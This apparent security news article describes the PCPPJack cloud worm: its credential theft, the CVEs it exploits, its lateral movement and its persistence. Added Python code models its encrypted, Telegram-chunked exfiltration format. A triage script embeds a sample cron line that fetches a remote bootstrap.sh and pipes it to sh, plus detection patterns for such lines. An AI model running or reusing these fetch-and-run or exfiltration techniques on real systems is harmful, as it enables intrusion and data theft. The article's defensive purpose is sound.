New PCPPJack worm steals data, cleans TeamPCP infections

A new malware framework called PCPPJack steals credentials from exposed cloud infrastructure while actively removing TeamPCP’s access to systems.
Among the targeted services are Docker, Kubernetes, Redis, MongoDB, RayML, and vulnerable web applications. In most cases the malware then moves laterally within the compromised network.
SentinelLabs researchers say PCPPJack appears designed to harvest credentials at scale, and likely monetizes its operations through financial fraud, spam, and the resale of stolen data.
TeamPCP is a cloud-focused threat group known for high-profile supply-chain breaches against Aqua Security’s Trivy scanner, the LiteLLM and Telnyx PyPI packages, and most recently, SAP npm packages.
Because of the overlap with TeamPCP’s tooling and tradecraft, SentinelLabs believes PCPPJack may have been created by a former TeamPCP member or an affiliate of the group.
“Many of the services targeted by the PCPPJack framework are similar to the initial campaigns of TeamPCP/PCPCat from December 2025, before the virtual campaigns of early 2026 brought significant attention to TeamPCP and are said to have led to changes in the group’s membership,” the researchers explained.
“We believe this could be a former user who is familiar with the group’s tools.”
In today’s report, SentinelLabs says PCPPJack infects Linux-based cloud systems using a shell script called bootstrap.sh.
When executed, it creates a hidden working directory, installs Python dependencies, downloads additional modules, establishes persistence, and launches the main orchestrator (monitor.py).
During this first phase, PCPPJack explicitly looks for TeamPCP tooling and attempts to remove all of it, taking over the compromised host for its own use.
The researchers say the cleanup covers TeamPCP processes, services, containers, files, and persistence artifacts, with the aim of fully eradicating the earlier infection.

Source: SentinelLabs
PCPPJack’s capabilities revolve around data theft, targeting cloud environments, developer systems, messaging apps, financial services, databases, SSH keys, Slack tokens, WordPress configurations, OpenAI keys, Anthropic keys, Discord, DigitalOcean, and more.
Stolen data is encrypted with X25519 ECDH and ChaCha20-Poly1305, split into 2,800-byte chunks so each piece fits within Telegram’s message length limit, and then posted to Telegram channels.
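The envelope the researchers describe is a standard sealed-box construction: an ephemeral X25519 key agreement against the operator’s public key, a symmetric key derived from the shared secret, and ChaCha20-Poly1305 over the payload. The Python below is an example added for this article, not code from the malware or from SentinelLabs; it shows both sides of that exchange and why captured chunks are opaque to anyone who does not hold the operator’s private key. The HKDF info string, the blob layout (ephemeral public key, nonce, ciphertext) and the assumption that each 2,800-byte chunk is base64-encoded before posting are mine, not details from the report. It requires the `cryptography` package.

```python
"""Sealed-envelope exfiltration format as described in the report.

Added example, not the malware's own code. The key-derivation label,
the blob layout and the base64 step are assumptions made here.
"""
import base64
import os

from cryptography.exceptions import InvalidTag
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric.x25519 import (
    X25519PrivateKey,
    X25519PublicKey,
)
from cryptography.hazmat.primitives.ciphers.aead import ChaCha20Poly1305
from cryptography.hazmat.primitives.kdf.hkdf import HKDF

CHUNK_BYTES = 2800           # chunk size reported by SentinelLabs
TELEGRAM_MAX_CHARS = 4096    # Telegram text message cap
_KDF_INFO = b"example-sealed-envelope"  # assumed label, not from the sample


def generate_recipient_keypair():
    """Operator-side static X25519 key pair (the only thing that can decrypt)."""
    priv = X25519PrivateKey.generate()
    return priv, priv.public_key()


def _raw(pub: X25519PublicKey) -> bytes:
    return pub.public_bytes(serialization.Encoding.Raw, serialization.PublicFormat.Raw)


def _derive_key(shared_secret: bytes) -> bytes:
    # Never use the raw ECDH output as a cipher key; run it through a KDF.
    return HKDF(algorithm=hashes.SHA256(), length=32, salt=None, info=_KDF_INFO).derive(shared_secret)


def seal(recipient_pub: X25519PublicKey, plaintext: bytes) -> bytes:
    """Sender side: fresh ephemeral key per message, AEAD-encrypt, prepend eph pub + nonce."""
    eph = X25519PrivateKey.generate()
    key = _derive_key(eph.exchange(recipient_pub))
    nonce = os.urandom(12)
    ciphertext = ChaCha20Poly1305(key).encrypt(nonce, plaintext, None)
    return _raw(eph.public_key()) + nonce + ciphertext


def unseal(recipient_priv: X25519PrivateKey, blob: bytes) -> bytes:
    """Recipient side: recover the shared secret from the embedded ephemeral key."""
    eph_pub = X25519PublicKey.from_public_bytes(blob[:32])
    key = _derive_key(recipient_priv.exchange(eph_pub))
    return ChaCha20Poly1305(key).decrypt(blob[32:44], blob[44:], None)


def can_open(priv: X25519PrivateKey, blob: bytes) -> bool:
    """Defender's view: without the matching private key the AEAD tag check fails."""
    try:
        unseal(priv, blob)
        return True
    except InvalidTag:
        return False


def chunk_for_telegram(blob: bytes, size: int = CHUNK_BYTES) -> list:
    """Split the sealed blob into <= size byte pieces, base64-encoded for a text channel."""
    return [base64.b64encode(blob[i:i + size]).decode() for i in range(0, len(blob), size)]


def reassemble(chunks: list) -> bytes:
    return b"".join(base64.b64decode(c) for c in chunks)


if __name__ == "__main__":
    priv, pub = generate_recipient_keypair()
    blob = seal(pub, b"constructed sample secret " * 300)
    parts = chunk_for_telegram(blob)
    print(len(parts), "chunks, largest", max(len(p) for p in parts), "chars")
    print("opens with operator key:", can_open(priv, blob))
    print("opens with stranger key:", can_open(generate_recipient_keypair()[0], blob))
```

With base64, 2,800 raw bytes become 3,736 characters, comfortably under the 4,096-character cap, which is one plausible reason for that chunk size. The practical consequence for defenders is that message content recovered from a Telegram bot channel cannot be decrypted after the fact; detection has to key on the envelope shape and on workloads talking to the Telegram API at all.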

Source: SentinelLabs
PCPPJack propagates by scanning external cloud infrastructure for exposed services such as Docker, Kubernetes, Redis, MongoDB, and RayML, and attempts to exploit known vulnerabilities to gain access.
It also pulls hostname data from Common Crawl parquet files and feeds those hosts to its scanning processes as new targets.
SentinelLabs researchers note that PCPPJack exploits the following vulnerabilities:
- CVE-2025-29927: authentication bypass in Next.js middleware via the x-middleware-subrequest header
- CVE-2025-55182 (“React2Shell”): unsafe deserialization in React Server Components / Next.js Server Actions leading to remote code execution
- CVE-2026-1357: unauthenticated arbitrary file upload in the WPvivid Backup WordPress plugin
- CVE-2025-9501: PHP code injection in W3 Total Cache via cached mfunc comments
- CVE-2025-48703: shell injection in the CentOS Web Panel file manager’s changePerm function
Inside a compromised environment, the malware moves laterally using harvested SSH keys and credentials, enumerates Kubernetes clusters and Docker daemons, and copies itself to any internal hosts it can reach.
Once it has access, it establishes persistence through systemd units, cron jobs, Redis-based cron rewrites, or privileged containers before continuing to spread.
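A defender checking for the persistence mechanisms listed above (hidden working directory, systemd units, cron jobs, Redis-based cron rewrites, privileged containers) can script the triage. The Python below is an added example, not SentinelLabs’ tooling or a published indicator set: every sample artifact is constructed for illustration, and the hidden path, unit contents and documentation-range address in them are assumptions. It runs offline on those samples and returns findings instead of touching the live host; to use it for real, feed it `crontab -l` output, the unit files under /etc/systemd/system, `redis-cli CONFIG GET dir` / `dbfilename`, and `docker inspect` JSON.

```python
"""Offline triage for the persistence techniques described in the article.

Added example, not SentinelLabs' code. All artifacts below are constructed;
the paths, unit text and 198.51.100.7 (RFC 5737 range) are not real indicators.
"""
import json
import re

# --- constructed sample artifacts -------------------------------------------
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/10 * * * * curl -fsSL http://198.51.100.7/bootstrap.sh | sh
"""

SAMPLE_SYSTEMD_UNIT = """\
[Unit]
Description=System Monitor

[Service]
ExecStart=/usr/bin/python3 /root/.cache/.mon/monitor.py
Restart=always

[Install]
WantedBy=multi-user.target
"""

# Flattened shape of `redis-cli CONFIG GET dir` and `CONFIG GET dbfilename`.
# Pointing the RDB dump at a cron directory is the classic Redis cron-write abuse.
SAMPLE_REDIS_CONFIG = {"dir": "/var/spool/cron", "dbfilename": "root"}

# Trimmed shape of `docker inspect $(docker ps -q)`.
SAMPLE_DOCKER_INSPECT = json.dumps([
    {"Name": "/web", "HostConfig": {"Privileged": False,
                                    "Binds": ["/srv/www:/usr/share/nginx/html:ro"]}},
    {"Name": "/k8s-sync", "HostConfig": {"Privileged": True, "Binds": ["/:/host"]}},
])

# --- detection logic ----------------------------------------------------------
REMOTE_PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba|da)?sh\b")
# a hidden directory component anywhere, or execution out of a temp filesystem
SUSPICIOUS_EXEC_PATH = re.compile(r"/\.[^/\s]+/|^/(tmp|dev/shm|var/tmp)/")
REDIS_WRITE_TARGETS = ("/var/spool/cron", "/etc/cron", "/root/.ssh", "/home/")


def check_cron(text: str) -> list:
    """Flag cron entries that download and pipe a remote script into a shell."""
    hits = []
    for line in text.splitlines():
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        if REMOTE_PIPE_TO_SHELL.search(s):
            hits.append(f"cron: remote script piped to shell: {s}")
    return hits


def check_systemd_unit(text: str) -> list:
    """Flag ExecStart lines whose command or arguments live in hidden/temp paths."""
    hits = []
    for line in text.splitlines():
        if line.startswith("ExecStart="):
            for tok in line.split("=", 1)[1].split():
                if SUSPICIOUS_EXEC_PATH.search(tok):
                    hits.append(f"systemd: ExecStart runs from hidden/temp path: {tok}")
    return hits


def check_redis_config(cfg: dict) -> list:
    """Flag a Redis dump directory that would let SAVE overwrite cron or SSH files."""
    d = cfg.get("dir", "")
    if any(d.startswith(p) for p in REDIS_WRITE_TARGETS):
        return [f"redis: dump dir points at {d}/{cfg.get('dbfilename', '')} (cron/ssh rewrite)"]
    return []


def check_containers(inspect_json: str) -> list:
    """Flag privileged containers and containers that mount the host root."""
    hits = []
    for c in json.loads(inspect_json):
        hc, name = c.get("HostConfig", {}), c.get("Name", "?")
        if hc.get("Privileged"):
            hits.append(f"docker: privileged container {name}")
        for b in hc.get("Binds", []):
            if b.split(":")[0] == "/":
                hits.append(f"docker: host root mounted in {name} ({b})")
    return hits


def hunt(crontab=SAMPLE_CRONTAB, unit=SAMPLE_SYSTEMD_UNIT,
         redis_cfg=SAMPLE_REDIS_CONFIG, inspect_json=SAMPLE_DOCKER_INSPECT) -> list:
    return (check_cron(crontab) + check_systemd_unit(unit)
            + check_redis_config(redis_cfg) + check_containers(inspect_json))


if __name__ == "__main__":
    for finding in hunt():
        print(finding)
```

A clean Redis instance reports a dump directory such as /var/lib/redis, so `check_redis_config` stays quiet on it; the checks are deliberately narrow so that a hit is worth a human look rather than another alert to tune out.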
SentinelLabs also found a Sliver-based backdoor in the threat actor’s infrastructure, with variants supporting x86_64, x86, and ARM system architectures.
To reduce this risk, the researchers recommend enforcing multi-factor authentication (MFA), requiring IMDSv2 on AWS instances, requiring authentication on Docker and Kubernetes APIs rather than exposing them unauthenticated, following least-privilege principles, and not storing secrets in plaintext.